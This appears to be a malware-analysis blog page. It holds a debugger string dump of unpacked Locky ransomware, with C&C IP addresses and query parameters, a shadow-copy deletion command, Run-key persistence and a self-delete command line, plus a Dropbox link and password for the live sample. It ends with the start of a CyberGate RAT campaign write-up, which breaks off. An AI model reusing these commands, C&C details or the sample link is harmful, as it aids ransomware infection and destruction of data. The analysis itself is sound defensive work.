<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402763 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402832 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004028C4 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402AE8 PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402B64 PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402D2E ASCII "L~",0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402D85 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403174 PUSH Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040326D PUSH Dumped.004139BC ASCII "id="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403281 PUSH Dumped.004139A8 ASCII "&act=stats&path="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004032A8 PUSH Dumped.0041399C ASCII "&encrypted="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004032D2 PUSH Dumped.00413990 ASCII "&failed="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004032F9 PUSH Dumped.00413984 ASCII "&length="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403575 MOV EDI,Dumped.004139C0 ASCII "Windows 2000"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403599 MOV EDI,Dumped.004139D0 ASCII "Windows XP"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035A7 MOV EDI,Dumped.004139DC ASCII "Windows 2003"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035B1 MOV EDI,Dumped.004139EC ASCII "Windows 2003 R2"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035D3 MOV EDI,Dumped.004139FC ASCII "Windows Vista"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035DA MOV EDI,Dumped.00413A0C ASCII "Windows Server 2008"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035EA MOV EDI,Dumped.00413A20 ASCII "Windows 7"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035F1 MOV EDI,Dumped.00413A2C ASCII "Windows Server 2008 R2"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403602 MOV EDI,Dumped.00413A44 ASCII "Windows 8"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403609 MOV EDI,Dumped.00413A50 ASCII "Windows Server 2012"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040361A MOV EDI,Dumped.00413A64 ASCII "Windows 8.1"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403621 MOV EDI,Dumped.00413A70 ASCII "Windows Server 2012 R2"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040363E MOV EDI,Dumped.00413A88 ASCII "Windows 10"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403645 MOV EDI,Dumped.00413A94 ASCII "Windows Server 2016 Technical Preview"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040364C MOV EDI,Dumped.00413ABC ASCII "unknown"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004036C5 PUSH Dumped.00413CF4 ASCII "IsWow64Process"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004036CA PUSH Dumped.00413CE4 ASCII "kernel32.dll"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040376F PUSH Dumped.004139BC ASCII "id="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040377E PUSH Dumped.00413AF4 ASCII "&act=getkey&affid="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004037A5 PUSH Dumped.00413AEC ASCII "&lang="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004037CB PUSH Dumped.00413AE4 ASCII "&corp="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004037F7 PUSH Dumped.00413ADC ASCII "&serv="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403820 PUSH Dumped.00413AD4 ASCII "&os="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403847 PUSH Dumped.00413ACC ASCII "&sp="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040386E PUSH Dumped.00413AC4 ASCII "&x64="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403A33 PUSH Dumped.00413B08 ASCII "Tahoma"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DB4 MOV DWORD PTR SS:[ESP],Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DC5 PUSH Dumped.00413B10 UNICODE "\_Locky_recover_instructions.bmp"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403E75 PUSH Dumped.00413B54 ASCII "Control Panel\Desktop"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403F17 MOV ECX,Dumped.00413B70 ASCII "WallpaperStyle"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403F9B MOV ECX,Dumped.00413B80 ASCII "TileWallpaper"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403FE6 MOV EDI,Dumped.00413B90 UNICODE "open"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004040A9 PUSH Dumped.00413CC4 ASCII "Wow64DisableWow64FsRedirection"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004040AE PUSH Dumped.00413CE4 ASCII "kernel32.dll"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004040DA MOV ESI,Dumped.004137EF ASCII "188.138.88.184,31.184.197.119,51.254.19.227,5.34.183.195,185.14.29.188"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004041E3 PUSH Dumped.00413B9C ASCII "Software\Locky"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040422D PUSH Dumped.00413BAC ASCII "id"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404288 MOV EBX,Dumped.00413BB0 ASCII "pubkey"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004042E2 PUSH Dumped.00413BB8 ASCII "paytext"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404355 PUSH Dumped.00413BC0 ASCII "completed"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004043ED PUSH Dumped.00413BCC UNICODE "svchost.exe"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040448A MOV ECX,Dumped.00413BAC ASCII "id"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004044E1 PUSH Dumped.00413BE4 UNICODE ":Zone.Identifier"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004045C6 PUSH Dumped.004139BC ASCII "id="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004045DC PUSH Dumped.00413C08 ASCII "&act=gettext&lang="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040468D PUSH Dumped.00413BB8 ASCII "paytext"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004047B5 PUSH Dumped.00413C20 UNICODE "vssadmin.exe Delete Shadows /All /Quiet"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004047E2 PUSH Dumped.00413C70 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040486B PUSH Dumped.00413BC0 ASCII "completed"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004048AD PUSH Dumped.00413CAC ASCII "Locky"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404993 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404A78 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404EE1 PUSH Dumped.00413CA0 UNICODE "Locky"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404F81 PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404FA0 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00405041 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004050BB PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004051B4 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00405409 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004055C2 PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040563A PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004057E6 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00405AAC MOV EDX,Dumped.00413CB4 UNICODE "/\"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00406393 MOV EDX,Dumped.00413CB4 UNICODE "/\"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004064A2 PUSH Dumped.00413D0C UNICODE "cmd.exe /C del /Q /F ""</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004064DE PUSH Dumped.00413D04 UNICODE "sys"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004069CA PUSH Dumped.00413D50 ASCII "HTTP/1.1"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004069D6 PUSH Dumped.00413D8C ASCII "POST"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004071D5 PUSH Dumped.00413D84 ASCII "http://"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004071E5 PUSH Dumped.00413D78 ASCII "/main.php"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040753F PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040759C PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040778B PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004078CA PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CBA PUSH Dumped.004147A0 UNICODE "\*"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004087B9 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040880F PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00408866 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004088C6 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004089C4 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00408AC0 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CF7 MOV EAX,Dumped.00411344 ASCII "Unknown exception"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E56 MOV DWORD PTR SS:[EBP-4],Dumped.004138B4 ASCII "bad allocation"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040AB74 CALL Dumped.0040D1F9 (Initial CPU selection)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040ADAC PUSH Dumped.00411D44 UNICODE "Runtime Error!</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Program: "</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040ADED PUSH Dumped.00411D14 UNICODE "&lt;program name unknown&gt;"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040AE2E PUSH Dumped.00411D0C UNICODE "..."</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040AE43 PUSH Dumped.00411D04 UNICODE "</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040AE74 PUSH Dumped.00411CB8 UNICODE "Microsoft Visual C++ Runtime Library"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040B4F9 PUSH Dumped.00411D88 UNICODE "mscoree.dll"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040B508 PUSH Dumped.00411D78 ASCII "CorExitProcess"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C47C PUSH Dumped.004120F0 UNICODE "KERNEL32.DLL"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C6E9 PUSH Dumped.004120F0 UNICODE "KERNEL32.DLL"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C70A PUSH Dumped.0041212C ASCII "FlsAlloc"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C712 PUSH Dumped.00412120 ASCII "FlsGetValue"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C71F PUSH Dumped.00412114 ASCII "FlsSetValue"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C72C PUSH Dumped.0041210C ASCII "FlsFree"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D7DD PUSH Dumped.004129E8 UNICODE "USER32.DLL"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D7F8 PUSH Dumped.004129DC ASCII "MessageBoxW"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D811 PUSH Dumped.004129CC ASCII "GetActiveWindow"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D821 PUSH Dumped.004129B8 ASCII "GetLastActivePopup"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D831 PUSH Dumped.0041299C ASCII "GetUserObjectInformationW"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D84A PUSH Dumped.00412984 ASCII "GetProcessWindowStation"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040FD27 MOV DWORD PTR SS:[EBP+8],Dumped.004147BC ASCII "bad exception"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
</div>
<div style="text-align: left;">
<b style="font-family: Arial, Helvetica, sans-serif;">Files encrypted with the .locky extension</b></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_xhzom0psmKCAIgPphcOgVpv9rIQqvG74HVLZY4UTbGtIzvFzGzFiCxRtqr-ZT2N4CZIdwNzFNSevyKX_VMIaI-74TuRmvcWpU9w_fwOTTv3BtI2fpStlrGwS3NuyLmBAF-r3U3xP42c/s1600/04.jpg" imageanchor="1"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_xhzom0psmKCAIgPphcOgVpv9rIQqvG74HVLZY4UTbGtIzvFzGzFiCxRtqr-ZT2N4CZIdwNzFNSevyKX_VMIaI-74TuRmvcWpU9w_fwOTTv3BtI2fpStlrGwS3NuyLmBAF-r3U3xP42c/s400/04.jpg" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Communication with the C&amp;C</b></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMqq0KQzsKPLNAEdFSq-JEHzF-rAGc-F_6zo0jVjxjO7ij1fdSUkWi1kZPSJWUDKXphEouPO9o2w99y04HGmOX95XiPzl2LELrX6DnfninWh8XQ9dyLr6iNT2NWoKYWRyUaOE8hgFgupg/s1600/06.jpg" imageanchor="1"><img border="0" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMqq0KQzsKPLNAEdFSq-JEHzF-rAGc-F_6zo0jVjxjO7ij1fdSUkWi1kZPSJWUDKXphEouPO9o2w99y04HGmOX95XiPzl2LELrX6DnfninWh8XQ9dyLr6iNT2NWoKYWRyUaOE8hgFgupg/s640/06.jpg" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The unexpected message telling us we are victims of this damned ransomware.</span></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_UOKdgBWB3EH0eWToiyY5r1ZpTiuvL4ldWrLKum-c6iVAirHIuI9GZXRADcsuYQPz2iFTSHnTKt2UqCmXlVEW0R4bKVdFUosC7KF1HRzjgVZTGR_HHnL2aYN_phjPX9lApyKQJCmy54o/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_UOKdgBWB3EH0eWToiyY5r1ZpTiuvL4ldWrLKum-c6iVAirHIuI9GZXRADcsuYQPz2iFTSHnTKt2UqCmXlVEW0R4bKVdFUosC7KF1HRzjgVZTGR_HHnL2aYN_phjPX9lApyKQJCmy54o/s320/05.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">If we have no BACKUP of our files, we are TOAST!!!!!</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_UOKdgBWB3EH0eWToiyY5r1ZpTiuvL4ldWrLKum-c6iVAirHIuI9GZXRADcsuYQPz2iFTSHnTKt2UqCmXlVEW0R4bKVdFUosC7KF1HRzjgVZTGR_HHnL2aYN_phjPX9lApyKQJCmy54o/s1600/05.jpg" imageanchor="1"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1QD9F8BDaoLmpwBxUZJNHqYQaGNaOuMViiwUI6mXziG8DYT8bif8_ABaxKA1fMfp37t9UM_k2_9fK-xAAihl9_TExkUPZ6EAqRpfpAvhmaSIJBgjBkZkaGN9Q2kcXPrRmhgKx4zOV7J0/s1600/07.jpg" imageanchor="1"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1QD9F8BDaoLmpwBxUZJNHqYQaGNaOuMViiwUI6mXziG8DYT8bif8_ABaxKA1fMfp37t9UM_k2_9fK-xAAihl9_TExkUPZ6EAqRpfpAvhmaSIJBgjBkZkaGN9Q2kcXPrRmhgKx4zOV7J0/s640/07.jpg" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Sample: https://www.dropbox.com/s/6jk38tqjxh2qmb1/Locky-2-03-16.zip?dl=0</span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Pass= infected</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now. @Dkavalanche 2016</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>@Dkavalanche, 2015-12-17</div><b style="background-color: #fefdfa; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;">CyberGate RAT campaign. Fake e-mail:</b><br />
<h2 class="rmSubject" style="margin: 0px 0px 13px; padding-top: 2px;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><span style="color: #444444;"><span style="font-weight: normal; line-height: 29.9904px;">"Hi, everyone knows it except you, they are cheating on you, open your eyes"</span></span></span></h2>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">It contains three links that download an executable with the Adobe Flash icon.</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"></span><br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">http://urlquery.net/report.php?id=1450312796496</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">
<div>
http://urlquery.net/report.php?id=1450312974084</div>
<div>
<br /></div>
</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgADg-6vg23r2HeuT343KYQ6L__mI5PrN4HoGjBJ0cOHiESNta4U5dE_uag0BIatyQd09kVX_e-upfnBzIrbLPzIg6yGkFVFSQy4fjZC7S90-WoSTl0Ov-IwHyWEnDqoJuRrc7sXHv6g9M/s1600/fake.jpg" imageanchor="1"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgADg-6vg23r2HeuT343KYQ6L__mI5PrN4HoGjBJ0cOHiESNta4U5dE_uag0BIatyQd09kVX_e-upfnBzIrbLPzIg6yGkFVFSQy4fjZC7S90-WoSTl0Ov-IwHyWEnDqoJuRrc7sXHv6g9M/s640/fake.jpg" width="640" /></a></span></div>
<div>
<br /></div>
<div>
<br /></div>
<div style="text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Icon</span></div>
<div>
<br /></div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbbD67RPBWIXqTAUKXSC6jFu4yy59bxSEFgqAxDIV8nzPEc5EJr9YBIDDwZk0dP7ezIR4ruogmwAxINZJVV1FRpvnU83ClbkNzyspWLp_CRYfafO6t3uxVdVH_2TVNzYGueeoC3Vcdsr4/s1600/02.JPG" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbbD67RPBWIXqTAUKXSC6jFu4yy59bxSEFgqAxDIV8nzPEc5EJr9YBIDDwZk0dP7ezIR4ruogmwAxINZJVV1FRpvnU83ClbkNzyspWLp_CRYfafO6t3uxVdVH_2TVNzYGueeoC3Vcdsr4/s400/02.JPG" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">It has a basic but effective crypter layer; only 8 antivirus engines detected it.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6xv6w8uekw81jAh3Q7nQqb1GaSrfjMzWK78RSQKzO4t-1rfyR3kyWStmUdq5UU7ZORN8vL2WfQx58HP3GMuU4DY80PCfnXTa5GjjmfDw8aMIirDtYRv0uP9I2Ww6X3TuGJelg2FDsg8s/s1600/vt.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6xv6w8uekw81jAh3Q7nQqb1GaSrfjMzWK78RSQKzO4t-1rfyR3kyWStmUdq5UU7ZORN8vL2WfQx58HP3GMuU4DY80PCfnXTa5GjjmfDw8aMIirDtYRv0uP9I2Ww6X3TuGJelg2FDsg8s/s1600/vt.jpg" /></a></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">We dump it with a breakpoint on WriteVirtualMemory.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq3cIUFUPDce7lMM8TKscY1ETfV9WOShdrFElpUARbX185kV4R7UDrFnZJuF7n_xE8IcxwvQyUJlraIzXlugmo3eVJAGZEQXK_Keo73oDWdhZNZFiIbXBREyXte9siSVxGFGH8uVUuyBE/s1600/01.JPG" imageanchor="1"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq3cIUFUPDce7lMM8TKscY1ETfV9WOShdrFElpUARbX185kV4R7UDrFnZJuF7n_xE8IcxwvQyUJlraIzXlugmo3eVJAGZEQXK_Keo73oDWdhZNZFiIbXBREyXte9siSVxGFGH8uVUuyBE/s640/01.JPG" width="640" /></a></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Now, without the crypter layer, things change and it is detected by more AVs.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
